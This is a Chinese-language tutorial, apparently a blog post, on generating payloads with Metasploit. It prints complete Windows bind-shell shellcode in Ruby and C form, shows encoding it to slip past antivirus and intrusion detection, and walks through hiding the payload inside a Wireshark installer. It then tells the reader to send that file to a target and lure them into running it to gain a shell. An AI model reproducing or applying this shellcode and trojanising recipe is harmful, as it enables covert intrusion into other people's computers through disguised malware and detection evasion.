谈谈Metasploit中payload模块

我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell.

msf > use payload/windows/shell_bind_tcp   #使用该模块绑定(监听)本机的一个TCP连接端口
msf payload(windows/shell_bind_tcp) > generate  #通过generate生成16进值的payload,默认以rube语言编写的
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

由 generate 产生的shellcode是完全可以运行的,但是其中包含一些null空字符,在一些程序进行解析时,这些空字符会被认为是字符串的结束,从而使得代码在完整执行之前被截断而终止运行。简单来说,这些\x00 ,\ff和\xff字符会破坏攻击负荷。

另外,在网络上明文传输的shellcode很可能被入侵检测系统和杀毒软件所识别,为了解决这一问题,Metasploit的开发提供MSF编码器,可以帮助渗透测试者通过对原始攻击载荷进行编码的方式,来避免坏字符,以及逃避杀毒软件和IDS的检测。
我们使用generate -b '\x00’将\x00坏字符进行编码避免在执行的过程中被截断而终止.

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai  #表示使用此Encoder对坏字符进行编码,generate会自动选择Encoder
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xbd\x43\x0e\x07\xaa\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x68\x12\x03\x68\x12\x83\xab\xf2\xe5\x5f\xd7" +
"\xe3\x68\x9f\x27\xf4\x0c\x29\xc2\xc5\x0c\x4d\x87\x76\xbd" +
"\x05\xc5\x7a\x36\x4b\xfd\x09\x3a\x44\xf2\xba\xf1\xb2\x3d" +
"\x3a\xa9\x87\x5c\xb8\xb0\xdb\xbe\x81\x7a\x2e\xbf\xc6\x67" +
"\xc3\xed\x9f\xec\x76\x01\xab\xb9\x4a\xaa\xe7\x2c\xcb\x4f" +
"\xbf\x4f\xfa\xde\xcb\x09\xdc\xe1\x18\x22\x55\xf9\x7d\x0f" +
"\x2f\x72\xb5\xfb\xae\x52\x87\x04\x1c\x9b\x27\xf7\x5c\xdc" +
"\x80\xe8\x2a\x14\xf3\x95\x2c\xe3\x89\x41\xb8\xf7\x2a\x01" +
"\x1a\xd3\xcb\xc6\xfd\x90\xc0\xa3\x8a\xfe\xc4\x32\x5e\x75" +
"\xf0\xbf\x61\x59\x70\xfb\x45\x7d\xd8\x5f\xe7\x24\x84\x0e" +
"\x18\x36\x67\xee\xbc\x3d\x8a\xfb\xcc\x1c\xc3\xc8\xfc\x9e" +
"\x13\x47\x76\xed\x21\xc8\x2c\x79\x0a\x81\xea\x7e\x6d\xb8" +
"\x4b\x10\x90\x43\xac\x39\x57\x17\xfc\x51\x7e\x18\x97\xa1" +
"\x7f\xcd\x02\xa9\x26\xbe\x30\x54\x98\x6e\xf5\xf6\x71\x65" +
"\xfa\x29\x61\x86\xd0\x42\x0a\x7b\xdb\x7d\x97\xf2\x3d\x17" +
"\x37\x53\x95\x8f\xf5\x80\x2e\x28\x05\xe3\x06\xde\x4e\xe5" +
"\x91\xe1\x4e\x23\xb6\x75\xc5\x20\x02\x64\xda\x6c\x22\xf1" +
"\x4d\xfa\xa3\xb0\xec\xfb\xe9\x22\x8c\x6e\x76\xb2\xdb\x92" +
"\x21\xe5\x8c\x65\x38\x63\x21\xdf\x92\x91\xb8\xb9\xdd\x11" +
"\x67\x7a\xe3\x98\xea\xc6\xc7\x8a\x32\xc6\x43\xfe\xea\x91" +
"\x1d\xa8\x4c\x48\xec\x02\x07\x27\xa6\xc2\xde\x0b\x79\x94" +
"\xde\x41\x0f\x78\x6e\x3c\x56\x87\x5f\xa8\x5e\xf0\xbd\x48" +
"\xa0\x2b\x06\x78\xeb\x71\x2f\x11\xb2\xe0\x6d\x7c\x45\xdf" +
"\xb2\x79\xc6\xd5\x4a\x7e\xd6\x9c\x4f\x3a\x50\x4d\x22\x53" +
"\x35\x71\x91\x54\x1c"

当然也可以通过generate -e自行指定Encoder对坏字符进行编码

msf payload(windows/shell_bind_tcp) > generate -e x86/nonupper

generate的参数列表:
-b:指定对坏字符进行过滤编码
-t:指定payload的输出格式,如exe格式,py格式,默认是ruby语言编写的16进值编码的形式
-e:指定某个Encoder进行编码,不指定的话,系统会自行选择适合的Encoder
-i:后面跟编码迭代次数,也就是编码的次数
-k:不产生新的进程,只产生线程,提交隐蔽性.
-x:将payload穿插进入可执行的模板中(可以理解为应用程序)这样只要该应用程序运行,payload即也将会运行.
-f:指定输出的位置
举个例子:
我们在wireshark.exe程序中插入payload并命名为1.exe

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /root/Wireshark-win64-2.6.3.exe -f /root/1.exe
[*] Writing 628224 bytes to /root/1.exe...

然后可以将wireshark打包发送给目标主机使用者,诱使其点击,然后便可以在本地使用远程工具连接目标主机啦

NOP:no-operation/Next operation(无任何操作):当程序执行到NOP指令的时候,CUP会自动滑到当前字节的下一个字节,如果下一个字节也是NOP,便会一直往下滑

使用generate -t c:指定使用c语言编写此payload

msf payload(windows/shell_bind_tcp) > generate -t c
/*
 * windows/shell_bind_tcp - 328 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
 * EXITFUNC=process
 */
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7"
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97"
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
"\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0"
"\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5"
"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb"
"\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

你可能感兴趣的:(metasploit,kali)